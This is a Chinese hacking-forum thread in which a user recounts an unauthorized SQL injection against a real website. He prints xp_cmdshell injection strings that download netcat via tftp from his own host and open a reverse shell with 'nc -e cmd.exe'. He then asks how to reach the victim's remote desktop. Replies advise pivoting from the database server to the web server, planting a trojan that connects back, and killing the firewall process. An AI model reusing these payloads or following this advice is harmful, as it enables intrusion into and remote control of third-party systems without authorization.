|
 | 作者: ddddd [aitwins]
 论坛用户 |
登录 |
| 前几天对一网站进行sql注入 数据库用户为sa 所以开始都很顺利 id=100;exec master.dbo.xp_cmdshell 'tftp -i x.x.x.x get nc.exe';-- 然后在本机nc -l -p 53 id=100;exec master.dbo.xp_cmdshell 'nc -e c:\winnt\system32\cmd.exe x.x.x.x 53';-- 在53端口拿到了shell 很顺利 他的终端是开的 但是3389却连不上 我传了4899上去也连不上 我ping www.xxxx.net ip为202.x.x.231( 没ping通) 我看了看刚才从我的tftp服务端下载的地址却是 202.x.x.253 于是ping 202.x.x.253 ping通了 但是superscan 什么也扫不到 我在获得的shell上运行ipconfig命令发现ip显示为202.x.x.232 ip地址不同是因为他的web服务器和sql服务器不是同一主机上吗??? 有什么方法能连上他的终端吗?? 希望大家赐教 |
| 地主 发表时间: 04-07-05 10:12 |
| 回复: lijingxi [lijingxi]  见习版主 |
登录 |
|
主要问题是这样的! 现在大型网站的饿数据库服务器和WEB服务器不是一个服务器! 你现在利用sqlinjection漏洞入侵的是数据库服务器! 而你你PING得到的只是WEB服务器! 所以你传的RADMIN 连接不上的原因是IP没有写对! 最好是把数据库服务器先搞定 然后在渗透WEB服务器! 希望能和你交流一下!有一些问题向您请教! QQ607182 望联系!!! |
| B1层 发表时间: 04-07-05 11:43 |
| 回复: ddddd [aitwins] 论坛用户 |
登录 |
|
这些我都知道啊 呵呵 不过还你谢谢回复啊 我对那3个ip都用4899连了的都连不上 |
| B2层 发表时间: 04-07-05 18:18 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
那你有没有扫描数据库服务器的IP都开放什么端口了! 一般的数据库服务器出了1433什么都不开的!所以很不好搞! 你最好自己培植一个自动上线的木马!这样实验一下! |
| B3层 发表时间: 04-07-05 19:16 |
| 回复: ddddd [aitwins] 论坛用户 |
登录 |
|
3个ip都扫了的啊 什么信息都没扫到 不知道是不是被防火墙屏蔽了 我 |
| B4层 发表时间: 04-07-06 12:18 |
| 回复: ddddd [aitwins] 论坛用户 |
登录 |
|
3个ip都扫了的啊 什么信息都没扫到 不知道是不是被防火墙屏蔽了 你加我QQ大家给你研究一下 108653116 |
| B5层 发表时间: 04-07-06 12:20 |
 | 回复: lhh2003 [lhh2003] 论坛用户 |
登录 |
|
难道楼主只对3389,4899兴趣?为什么不加载别的小马马? |
| B6层 发表时间: 04-07-06 12:32 |
 | 回复: wish [wish259] 论坛用户 |
登录 |
|
对 嘻嘻 嘻嘻 嘻嘻 嘻嘻 嘻嘻 嘻嘻 嘻嘻 也感兴趣  |
| B7层 发表时间: 04-07-06 12:33 |
 | 回复: abctm [abctm]  版主 |
登录 |
|
1】人家有防火墙 2】数据服务器可能是另一台计算机 |
| B8层 发表时间: 04-07-06 12:36 |
| 回复: ddddd [aitwins] 论坛用户 |
登录 |
|
哎 还是防活墙的原因 kill了在说 |
| B9层 发表时间: 04-07-06 12:45 |
| 回复: lhh2003 [lhh2003] 论坛用户 |
登录 |
 杀了进程,all ok! |
| B10层 发表时间: 04-07-06 12:50 |
| 回复: wish [wish259] 论坛用户 |
登录 |
|
嘻嘻 嘻嘻 嘻嘻 嘻嘻 嘻嘻 嘻嘻 嘻嘻 连你一起杀,杀多了容易发现 |
| B11层 发表时间: 04-07-06 12:55 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: sqlinjection中遇到的问题